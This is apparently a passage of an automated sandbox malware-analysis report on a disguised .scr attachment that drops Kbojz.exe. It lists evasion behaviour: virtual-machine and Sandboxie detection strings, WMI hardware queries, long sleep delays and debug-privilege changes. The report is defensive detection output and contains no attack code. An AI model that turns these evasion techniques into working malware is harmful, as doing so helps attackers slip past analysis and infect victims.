                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 1E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 20E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 1DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 6010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 1E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 2250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 22D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 5F30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 6F30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 1E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 2210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 1F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 5D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 6D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 1E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 22F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 740000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 1F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 2270000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeMemory allocated: 1F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWindow / User API: threadDelayed 9241Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWindow / User API: threadDelayed 563Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWindow / User API: threadDelayed 4303Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWindow / User API: threadDelayed 1532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow / User API: threadDelayed 762Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow / User API: threadDelayed 5907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow / User API: threadDelayed 1089Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow / User API: threadDelayed 3288Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow / User API: threadDelayed 798
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow / User API: threadDelayed 2658
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3324Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3324Thread sleep time: -7200000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3328Thread sleep count: 9241 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3328Thread sleep count: 563 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3416Thread sleep count: 4303 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3408Thread sleep count: 1532 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3508Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3824Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3824Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr TID: 3388Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3620Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3620Thread sleep time: -8400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3624Thread sleep count: 762 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3624Thread sleep count: 5907 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3620Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3804Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3804Thread sleep time: -7200000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3808Thread sleep count: 1089 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3808Thread sleep count: 3288 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3804Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3768Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3880Thread sleep count: 798 > 30
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3888Thread sleep count: 2658 > 30
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3932Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3912Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 4068Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 4068Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exe TID: 3864Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeThread delayed: delay time: 922337203685477
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: pCnWVMciWU
                    Source: Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Kbojz.exe, 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeProcess token adjusted: Debug
